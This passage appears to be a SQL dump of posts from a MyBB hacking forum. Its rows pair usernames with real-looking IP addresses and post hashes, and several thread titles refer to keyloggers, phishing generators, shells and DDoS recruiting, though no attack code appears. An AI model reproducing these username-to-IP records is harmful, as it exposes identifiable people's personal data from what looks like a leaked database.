`disableeditedby`, `edittime2`) VALUES ('6138', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '222', 'Exposé', '1350927286', 'Welcome to LH and hope you can be active and enjoy it here!', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'abe6fedc7d7be08b21f41f1b8ff4d743', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6139', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '258', 'PiXEL^OG', '1350927829', 'Hi there , welcome to LH stay HQ and enjoy :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '609ec9c04638610d0831c0208c232cc3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6140', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1350929196', 'I\'ve made an updated version of the userbar, hopefully it fits your needs :) [img]http://i.imgur.com/Oy86Y.gif[/img]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '11daa7500244ad1227dd116aaeadb322', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6141', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '228', 'VirtualLegend', '1350937544', 'To risky for me, If i get caught than I\'m in a deep shit', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'fa760a11f550162f15b40798129c1879', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7245', '1211', '7170', '18', 'RE: Facebook Blaster Pro v10.0', '0', '53', 'sirchamp', '1352387169', 'Lol. Nice stuff you have timmy.. Post to unlock', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f013d0982a9e8e6416067923664dc868', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6143', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350937646', 'Glad to make the 6000th post on L33T Hacking.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a1e51af52225bc23352df22e71f52df5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6144', '1031', '6125', '7', 'RE: Testing new plugin public', '0', '1', 't3h jok3r', '1350937779', 'Correct it blocks all the links but it\'s because it\'s in the same postbit so if I try to remove it from the sig then it will be removed from the post message. [quote=\'sirchamp\' pid=\'6125\' dateline=\'1350918865\'] If I\'m forced to post... then Ill do it. [/quote] Lol thanks but this will only be for people that want to help LH get more posts and AVOID post here and PM me shit. This should be used in download links and passwords.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '26c44d5c181a90b2cd256c46620f7023', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6145', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '9', 'p420', '1350937875', 'Posting to check what\'s the buzz all about', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '69c50ccf930868b7354d73c9923d4154', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6146', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '260', 'micheal010', '1350938250', 'thanks, good job! will be very happy if it works perfectly.....', '196.46.245.49', '-1003555535', '0', '0', '0', '0', '1', '479092394463ae8d29d8552790a2cffd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6147', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '8', 'spacefish36', '1350938257', 'Nice will keep leechs out n less phpm', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0a92bd7fe8ccc696622dc7aa017c23a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6148', '918', '5088', '65', 'RE: I feel famous', '0', '82', 'iTzIpod', '1350938452', 'Yeah I saw that. :p Checking it out.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ceb7eeec44862fa0a0d328681c4ef7e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6149', '1063', '6121', '81', 'RE: Free Private Shells [Updated]', '0', '82', 'iTzIpod', '1350938499', 'Put them in a spoiler or code or something? :p Posting to view.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9c688de98fa64f0a1dfff18ba5d00c90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6150', '806', '4225', '58', 'RE: [NEW] (Recruiting) DDoS\'ers - Join today', '0', '82', 'iTzIpod', '1350938583', 'Good luck with the applications and group yourself! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd4b5ffa404e924742d3cb9bac50aecdc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6151', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1350938711', 'I don\'t seem to experience this problem? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cc167295114d5008d9c1f911a36452c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6152', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '82', 'iTzIpod', '1350938754', 'Welcome to LH Enjoy your stay! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a836a8d0932ad240ceb258956159def2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6153', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1350938799', 'That controller looks too big in my opinion. :p But it\'s still good!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0aaf6653575397a0721ea0ff962d1692', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6154', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350938833', 'Pssh I made the 6000th post on LH o.O', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'abc187b6f738f5dede66147aef6117dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6155', '1045', '6037', '49', 'RE: Group Format?', '0', '82', 'iTzIpod', '1350938911', 'Yeah. I want the Unique color to be something unique. Like Pink or so. I don\'t know.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b6d621fd7c960520e3f780e4a00d02d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6156', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350938966', 'Marketers will be added soon :) I\'m gonna be the 1st member to be in it :3 I hope..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a0364c9789c5039e6bb39358971af0c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6157', '1066', '6136', '48', 'RE: We have a problem here.', '0', '61', 'NXK', '1350939105', '[quote=\'VirtualLegend\' pid=\'6136\' dateline=\'1350925759\'] I\'m i doing good? so not what do i need to change? [/quote] Start handling threads in your sections, Make sure they\'re in the right area things like that.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c9f376c477d584c3bebf1f12f2ca9754', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6158', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1350939178', 'Bleh I will fix it later :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '730a0dc86560feae7e7e8ce598070cb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6159', '1063', '6121', '81', 'RE: Free Private Shells [Updated]', '0', '62', 'R?????zo?', '1350939240', 'Done :) Sorry maybe it was annoying for you since it had a bunch of links :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a176ba9b324c40306e8cb2c5bede6ec5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6160', '765', '3901', '46', 'RE: Vulcan Private Pisher Generator', '0', '62', 'R?????zo?', '1350939280', 'Thanks, looks awesome bro :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'bc8ec6044db2c1c21f8d442fa30456b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6161', '1045', '6037', '49', 'RE: Group Format?', '0', '222', 'Exposé', '1350939485', 'I will explain a little bit about this later lol', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6ad41b9fc586dbcf4b5bfefca7143ca0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6162', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '62', 'R?????zo?', '1350939495', 'thanks, this might come handy :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ccce1fb1b65e7eeb1df92c82f528c183', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6163', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1350939501', 'I really like that one, Ill add it soon! It\'s awesome man thank you.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'ee39e47b6f47e3cf09b7cb193abe1af7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6164', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1350940067', 'I made 2 more: [img]http://i.imgur.com/p3p8L.gif[/img] [img]http://img547.imageshack.us/img547/2716/gamersuserbar4.gif[/img]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ea4f836cc38e50e64af6c9ce45fe8a99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6165', '212', '6156', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '228', 'VirtualLegend', '1350940082', '[quote=\'iTzIpod\' pid=\'6156\' dateline=\'1350938966\'] Marketers will be added soon :) I\'m gonna be the 1st member to be in it :3 I hope.. [/quote] Lol I thought i was the first one Don\'t you think ?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a3a404e63ca182111fc58361c9df4248', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6166', '1045', '6155', '49', 'RE: Group Format?', '0', '62', 'R?????zo?', '1350940160', '[quote=\'iTzIpod\' pid=\'6155\' dateline=\'1350938911\'] Yeah. I want the Unique color to be something unique. Like Pink or so. I don\'t know. [/quote] I would love to see my username as pink :$ (no homo)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '32cfb245afbd9f9c41db1d0dcc13551f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6167', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '62', 'R?????zo?', '1350940210', 'you\'re leading with too much posts bro :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd4cd5f01a49744f4f4113f71516d8ab2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6168', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '228', 'VirtualLegend', '1350940296', 'L33thacking has already more than 1000 threads. All members Good job, and keep it up', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6abca6f71ec0ab3df0eb04eddc8ff987', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6169', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '61', 'NXK', '1350940383', 'I used to use this a long time ago when I was into this kind of stuff, It\'s pretty awesome Ill vouch for it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '173220c84f0d0c9505d07da153c4d546', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6170', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '285', 'dccfoux', '1350943375', 'nice share! thanks for the dropbox as well!', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '129e5896eda794de376572569f4cf12c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6171', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '285', 'dccfoux', '1350943465', 'wow, a nice, very long tut. Good job!', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', 'be62bf1fcf30205ca4839af996b0779a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6172', '1045', '6037', '49', 'RE: Group Format?', '0', '222', 'Exposé', '1350943512', 'No this isn\'t for people to get different colors and shit like coders and etc...I mean\'t so like if an admin is red...it shows up on the sections so it\'s easier to see who posted', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '058162ac1c504c98d67755a7038f3503', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6173', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '222', 'Exposé', '1350943547', 'I think I had an infection the other day....just formated my pc lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9db365d440fb51b3f2dc6a3d2d00afa5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6174', '1067', '0', '24', 'AMD or intel', '0', '285', 'dccfoux', '1350943568', 'Which do you think is better? AMD or intel. Personally for me intel. They are just way ahead of AMD. But AMD does have some nice, low-priced cpus.', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '4723b4ccb54472b2af7d5d41019855a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6175', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '222', 'Exposé', '1350943579', 'Yeh we are getting more and more of these milestones completed :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '786d67de6111022cf025977810652395', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6176', '613', '6164', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1350946897', '[img]http://i.imgur.com/p3p8L.gif[/img] This is it. I like', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7907de1149a1d5b1601459a20e1fa58f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6177', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350946930', 'Or, I can be the 2nd member. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7e37522b342cec59a4d0dfe68d2b7a9b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6178', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '82', 'iTzIpod', '1350947163', 'I was recently infected with a RAT a couple weeks ago. I don\'t remember when but it was my first time. I downloaded something from LeakForums and forgot to run it in Sandboxie and all. And got my computer infected. Good thing I had another friend that is a Pro RATer and RATs people and all. And he removed it for me. I would\'ve asked for your assistance but you weren\'t on.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fe3cbcf49f4db1366b2fec2f55a15f19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6179', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350947210', 'Weird.. I made 20% of total posts :p I feel like a spammer :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fcfdd8c88d3d7f86c90c29b230a8213d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6190', '1067', '6174', '24', 'RE: AMD or intel', '0', '205', 'mothered', '1350993995', 'I\'ve always been an Intel fan, and only deal with Intel. Had a few bad experiences with AMD.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5a3416b93fb20498328e2bd31264c8e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6191', '1058', '6090', '24', 'RE: Microsoft or Apple', '0', '205', 'mothered', '1350994083', 'Definitely Microsoft. For all my computational day to day tasks, and compatibility reasons, Microsoft In certainly the way to go.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd89be51253a95f5d9856d431ef790489', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6192', '532', '6173', '23', 'RE: Think you have an infection? Click Here.', '0', '205', 'mothered', '1350994329', '[quote=\'Exposé\' pid=\'6173\' dateline=\'1350943547\'] I think I had an infection the other day....just formated my pc lmao [/quote] Absolutely agree. I don\'t bother with system scans, etc. If you\'re organized, you\'ll be up and running within 2 hours by hitting a clean Installation of Windows. Anyhow, that said, this Is a great tutorial Indeed. Nice work.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ffa6a1ec90edbe60ef3943d30c975f63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6193', '874', '4744', '7', 'RE: N.A.S.A HACKED', '0', '285', 'dccfoux', '1350995425', '[quote=\'XxTREYZxX\' pid=\'4744\' dateline=\'1350276589\'] i think they need to upgrade their security settings. [/quote] lol, its not just as easy as that. A guy hacked and controlled a car that had Onstar on it. But if they blocked the hack the product would not work anymore', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '44ea256ca9ad84dc412a744b58a17b8e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6194', '1070', '0', '7', 'How many hours a day are you online?', '0', '205', 'mothered', '1350998892', 'Greetings everyone, As the title reads, how many hours a day are you online? On a non-work day, I hit anywhere between 12 -14 hours. When I have work the following day, probably half that amount (I try and get early nights). How about you guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'cb1db115042e080a37c238efd7ebe4fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6195', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '53', 'sirchamp', '1351005289', 'I have the same problem. You just have to refresh the page after you pressed \"Post Reply\".', '161.245.25.243', '-1577772557', '1', '0', '0', '0', '1', '784373958321b39cf667f59512a0121f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6196', '1056', '6083', '9', 'RE: make money by shortening websites', '0', '53', 'sirchamp', '1351005405', 'We already have a thread about adf.ly. And it wasnt written in 30 seconds...', '73.30.238.181', '1226763957', '1', '0', '0', '0', '1', '33da355cd61dc9330fffda58d0cf0b41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6197', '1060', '6151', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1351007531', '[quote=\'iTzIpod\' pid=\'6151\' dateline=\'1350938711\'] I don\'t seem to experience this problem? :/ [/quote] what browser do you use?', '92.250.52.128', '1559901312', '1', '0', '0', '0', '1', '06869e04505685a1a05b3363332de61c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6198', '918', '6085', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1351011709', '[quote=\'VirtualLegend\' pid=\'6085\' dateline=\'1350902619\'] Do you already have adsense on your YT account. And how much did you maked? [hr] Do you have adsense on your YT channel [hr] Do you have adsense on your YT channel [hr] Do you have adsense on 